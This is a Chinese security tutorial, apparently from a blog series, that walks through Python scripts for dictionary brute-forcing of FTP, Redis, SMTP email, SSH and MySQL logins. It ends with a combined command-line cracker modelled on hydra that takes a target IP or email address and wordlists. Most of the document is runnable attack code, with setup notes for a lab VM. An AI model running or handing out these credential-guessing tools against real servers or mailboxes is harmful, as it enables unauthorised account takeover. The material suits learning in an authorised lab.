第159天:安全开发-Python-协议库爆破&FTP&SSH&Redis&SMTP&MYSQL等

目录

[案例一: Python-文件传输爆破-ftplib 库操作 ftp 协议](#案例一: Python-文件传输爆破-ftplib 库操作 ftp 协议)

[​案例二: Python-数据库爆破-redis 库操作redis 协议](#案例二: Python-数据库爆破-redis 库操作redis 协议)

[案例三:Python-邮件爆破-smtplib 库操作 smtp 协议](#案例三:Python-邮件爆破-smtplib 库操作 smtp 协议)

案例四:Python-登录爆破-paramiko库操作ssh协议

[案例五: Python-数据库爆破-pymysql 库操作 mysql 协议](#案例五: Python-数据库爆破-pymysql 库操作 mysql 协议)

[案例六: python-爆破整合-小型hydra](#案例六: python-爆破整合-小型hydra)


案例一: Python-文件传输爆破-ftplib 库操作 ftp 协议

开一个ftp

利用ftp正确登录与失败登录都会有不同的回显

使用ftplib库进行测试

python 复制代码
from ftplib import FTP  
# FTP服务器地址  
ftp_server = '192.168.172.132'  
# FTP服务器端口(默认为21)  
ftp_port = 21
# FTP登录用户名  
ftp_user = 'root'  
# FTP登录密码  
ftp_pass = '123.comm'
ftp = FTP()
ftp.connect(ftp_server,ftp_port)
ftp.login(ftp_user,ftp_pass)

成功

失败

在此基础之上加上字典进行循环就能爆破出来密码

爆破ftp账号密码的程序

python 复制代码
from ftplib import FTP
def ftp_check(ip,port,username,password):
    ftp = FTP()
    ftp.connect(ip,port)
    try:
        ftp.login(username,password)
        print(username+"|"+password+"-->success")
        exit()
    except Exception as e:
        print(username+"|"+password+"-->failed")

if __name__ == '__main__':
    ip = input("please input ip:")
    port = int(input("please input port:"))
    with open('.\\conf\\dic_username_ftp.txt', 'r') as file:  
        names = file.readlines()  
        for name in names:
            name = name.replace("\n","")
            with open('.\\conf\\dic_password_ftp.txt', 'r') as file:  
                passwords = file.readlines()  
                for password in passwords:
                    password = password.replace("\n","")
                    ftp_check(ip,port,name,password)

运行结果

如果觉得输出太过繁琐,可以不输出失败的结果

案例二: Python-数据库爆破-redis 库操作redis 协议

开启redis:端口为6379

配置密码

尝试连接,redis没有账号这一说法,都是用密码连接就ok

连接成功之后可以设置变量,可以利用这一点如果没有连接的话会报错

因为普通连接就算连接不成功他也不会报错

爆破程序

python 复制代码
import redis
def redis_check(ip,password):
    try:
        conn=redis.Redis(host=ip, port=6379, password=password, db=0)
        conn.set("test","123")
        print(password+"-->success")
        conn.delete("test")
        exit()
    except Exception as e:
        print(password+"-->failed")

if __name__ == "__main__":
    ip = input("please input ip:")
    with open(".\\conf\\dic_password_redis.txt","r") as file:
        passwords = file.readlines()
        for password in passwords:
            password = password.replace("\n","")
            redis_check(ip,password)

运行结果

案例三:Python-邮件爆破-smtplib 库操作 smtp 协议

smtp调用库smtplib,smtp邮件可以利用授权码代替密码进行登录

需要根据后缀来进行判断是什么邮箱

代码,登录失败会报错

python 复制代码
import smtplib

def email_check(email,password):
    smtp_split = email.split("@")[1]
    smtp_server = 'smtp.'+smtp_split
    #print(smtp_server)
    smtp_port = 25
    try:
        smtp_conn = smtplib.SMTP()
        smtp_conn.connect(smtp_server, 25)  # 25 为 SMTP 端口号
        smtp_conn.login(email, password)
        print("password is "+password+' --> ok')
        exit()
    except Exception as e:
        pass
        #print("error")
    

if __name__ == "__main__":
    email = input("please input your eamil:")
    with open(".\\conf\\dic_password_email.txt","r") as file:
        passwords = file.readlines()
        for password in passwords:
            password = password.replace("\n","")
            email_check(email,password)

运行结果

案例四:Python-登录爆破-paramiko库操作ssh协议

ssh连接调用paramiko库

python 复制代码
import paramiko
# 创建SSH客户端
client = paramiko.SSHClient()
# 自动添加主机名和密钥到本地的known_hosts文件
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# 连接到远程主机
client.connect('远程主机IP',"port" username='用户名', password='密码')

连接成功不会报错

失败报错

代码,端口为连接的第二个参数,默认为22

python 复制代码
import paramiko,time

def ssh_check(ip,username,password):
    print(username + "  |  "+password +"")
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        client.connect(ip,username=username, password=password)
        print(username + "  |  "+password +"--> success")
        exit()
    except Exception as e:
        pass
        time.sleep(1)

if __name__ == '__main__':
    ip = input("please input ip:")
    with open('.\\conf\\dic_username_ssh.txt', 'r') as file:  
        names = file.readlines()  
        for name in names:
            name = name.replace("\n","")
            with open('.\\conf\\dic_password_ssh.txt', 'r') as file:  
                passwords = file.readlines()  
                for password in passwords:
                    password = password.replace("\n","")
                    ssh_check(ip,name,password)

运行结果

案例五: Python-数据库爆破-pymysql 库操作 mysql 协议

创建一个允许远程登陆的用户jie 123.com

CREATE USER 'jie'@'%' IDENTIFIED BY '123.com';

GRANT ALL PRIVILEGES ON *.* TO 'jie'@'%';

FLUSH PRIVILEGES;

能够成功连接

建立mysql连接

python 复制代码
import mysql.connector
# pip install mysql-connector-python 安装这个库
# 创建数据库连接
db = mysql.connector.connect(
    host="192.168.172.132",  # MySQL服务器地址
    port=3306,
    user="jie",   # 用户名
    password="123.comm",  # 密码
    database="mysql"  # 数据库名称
)

安装相关库

错误连接会报错

在此基础之上写爆破mysql

python 复制代码
import mysql.connector

def mysql_check(ip,port,username,password):
    try:
        db = mysql.connector.connect(
            host=ip,  # MySQL服务器地址
            port=port,
            user=username,   # 用户名
            password=password,  # 密码
            database="mysql"  # 数据库名称
        )
        print(username + " | " +password + "-->  success")
        exit()
    except Exception as e:
        pass
if __name__ == '__main__':
    ip = input("please input ip:")
    port = int(input("please input port:"))
    with open('.\\conf\\dic_username_ftp.txt', 'r') as file:  
        names = file.readlines()  
        for name in names:
            name = name.replace("\n","")
            with open('.\\conf\\dic_password_ftp.txt', 'r') as file:  
                passwords = file.readlines()  
                for password in passwords:
                    password = password.replace("\n","")
                    mysql_check(ip,port,name,password)

运行结果

案例六: python-爆破整合-小型hydra

如果再命令行以 python xx.py 123456这种后面带参数的方式输入需要引入sys库,利用sys.argv[1]

可以把变量设置在文件后面,如下图所示

代码,大部分功能已经实现,就是自定义字典的时候,不足5个参数的时候,必须有数字占位,否则,不能自动判断,多少参数,不然会报错

python 复制代码
from ftplib import FTP
import paramiko,time
import mysql.connector
import smtplib
import redis
import sys

def ftp_check(ip,port,username,password):
    ftp = FTP()
    ftp.connect(ip,port)
    try:
        ftp.login(username,password)
        print(username+"|"+password+"-->success")
        exit()
    except Exception as e:
        pass
        #print(username+"|"+password+"-->failed")


def ssh_check(ip,username,password):
    print(username + "  |  "+password +"")
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        client.connect(ip,username=username, password=password)
        print(username + "  |  "+password +"--> success")
        exit()
    except Exception as e:
        pass
        time.sleep(1)


def mysql_check(ip,port,username,password):
    try:
        db = mysql.connector.connect(
            host=ip,  # MySQL服务器地址
            port=port,
            user=username,   # 用户名
            password=password,  # 密码
            database="mysql"  # 数据库名称
        )
        print(username + " | " +password + "-->  success")
        exit()
    except Exception as e:
        pass


def email_check(email,password):
    smtp_split = email.split("@")[1]
    smtp_server = 'smtp.'+smtp_split
    smtp_port = 25
    try:
        smtp_conn = smtplib.SMTP()
        smtp_conn.connect(smtp_server, 25)  # 25 为 SMTP 端口号
        smtp_conn.login(email, password)
        print("password is "+password+' --> ok')
        exit()
    except Exception as e:
        pass
        #print("error")

def redis_check(ip,password):
    try:
        conn=redis.Redis(host=ip, port=6379, password=password, db=0)
        conn.set("test","123")
        print(password+"-->success")
        conn.delete("test")
        exit()
    except Exception as e:
        pass

if __name__ == "__main__":
    if len(sys.argv) <= 2:
        print('eg:固定字典使用说明:')
        print('python hydra.py ftp ip port')
        print('python hydra.py ssh ip')
        print('python hydra.py redis ip')
        print('python hydra.py mysql ip port')
        print('python hydra.py email xxxx@qq.com')
        print('eg:自定义字典使用说明:')
        print('python hydra.py ftp ip port user.txt pass.txt')
        print('python hydra.py ssh ip port user.txt pass.txt')
        print('python hydra.py redis ip 1 2 pass.txt')
        print('python hydra.py mysql ip port user.txt pass.txt')
        print('python hydra.py email xx@qq.com 2 3 pass.txt')
    if len(sys.argv) > 2:
        xy=sys.argv[1]
        ip=sys.argv[2]
    if len(sys.argv) > 3:
        port = sys.argv[3]
        port = int(port)
    if len(sys.argv) >= 5:
        usertxt=sys.argv[4]
        passtxt=sys.argv[5]
    try:
        if usertxt is not None:
            if xy=="ftp" :
                with open(usertxt, 'r') as file:  
                    names = file.readlines()
                    for name in names:
                        name = name.replace("\n","")
                        print(name)
                        with open(passtxt, 'r') as file:  
                            passwords = file.readlines()  
                            for password in passwords:
                                password = password.replace("\n","")
                                ftp_check(ip,port,name,password)
            elif xy=="ssh":
                with open(usertxt, 'r') as file:  
                    names = file.readlines()  
                    for name in names:
                        name = name.replace("\n","")
                        with open(passtxt, 'r') as file:  
                            passwords = file.readlines()  
                            for password in passwords:
                                password = password.replace("\n","")
                                ssh_check(ip,name,password)
            elif xy=="redis":
                with open(passtxt,"r") as file:
                    passwords = file.readlines()
                    for password in passwords:
                        password = password.replace("\n","")
                        redis_check(ip,password)
            elif xy=="mysql":
                with open(usertxt, 'r') as file:  
                    names = file.readlines()  
                    for name in names:
                        name = name.replace("\n","")
                        print(name)
                        with open(passtxt, 'r') as file:  
                            passwords = file.readlines()  
                            for password in passwords:
                                password = password.replace("\n","")
                                mysql_check(ip,port,name,password)
            elif xy=="email":
                email = ip
                print(email)
                with open(passtxt,"r") as file:
                    passwords = file.readlines()
                    for password in passwords:
                        password = password.replace("\n","")
                        email_check(email,password)
    except Exception as e:
        try:
            if xy=="ftp" :
                with open('.\\conf\\dic_username_ftp.txt', 'r') as file:  
                    names = file.readlines()  
                    for name in names:
                        name = name.replace("\n","")
                        with open('.\\conf\\dic_password_ftp.txt', 'r') as file:  
                            passwords = file.readlines()  
                            for password in passwords:
                                password = password.replace("\n","")
                                ftp_check(ip,port,name,password)
            elif xy=="ssh":
                with open('.\\conf\\dic_username_ssh.txt', 'r') as file:  
                    names = file.readlines()  
                    for name in names:
                        name = name.replace("\n","")
                        with open('.\\conf\\dic_password_ssh.txt', 'r') as file:  
                            passwords = file.readlines()  
                            for password in passwords:
                                password = password.replace("\n","")
                                ssh_check(ip,name,password)
            elif xy=="redis":
                with open(".\\conf\\dic_password_redis.txt","r") as file:
                    passwords = file.readlines()
                    for password in passwords:
                        password = password.replace("\n","")
                        redis_check(ip,password)
            elif xy=="mysql":
                with open('.\\conf\\dic_username_ftp.txt', 'r') as file:  
                    names = file.readlines()  
                    for name in names:
                        name = name.replace("\n","")
                        with open('.\\conf\\dic_password_ftp.txt', 'r') as file:  
                            passwords = file.readlines()  
                            for password in passwords:
                                password = password.replace("\n","")
                                
                                mysql_check(ip,3306,name,password)
            elif xy=="email":
                email = ip
                print(email)
                with open(".\\conf\\dic_password_email.txt","r") as file:
                    passwords = file.readlines()
                    for password in passwords:
                        password = password.replace("\n","")
                        email_check(email,password)
        except Exception as e:
            pass

运行结果

不输入参数进行提示

无自定义字典ftp爆破

无自定义字典ssh爆破

无自定义字典redis爆破

无自定义字典mysql爆破

无自定义字典邮箱爆破

自定义字典ftp爆破

自定义字典ssh爆破,这里我设置默认为22端口,用1做数字接收占位,无实质作用,可修改为更改端口

自定义字典爆破redis

自定义字典mysql爆破

自定义字典邮箱爆破

相关推荐
青木沐21 分钟前
Jenkins介绍
运维·jenkins
WTT00111 小时前
2024楚慧杯WP
大数据·运维·网络·安全·web安全·ctf
苹果醋31 小时前
React源码02 - 基础知识 React API 一览
java·运维·spring boot·mysql·nginx
日记跟新中2 小时前
Ubuntu20.04 修改root密码
linux·运维·服务器
唐小旭2 小时前
服务器建立-错误:pyenv环境建立后python版本不对
运维·服务器·python
BUG 4042 小时前
Linux——Shell
linux·运维·服务器
大霞上仙2 小时前
Linux 多命令执行
linux·运维·服务器
冷心笑看丽美人2 小时前
探索 Samba 服务器:搭建跨平台文件共享的桥梁
运维·服务器
晨欣2 小时前
Kibana:LINUX_X86_64 和 DEB_X86_64两种可选下载方式的区别
linux·运维·服务器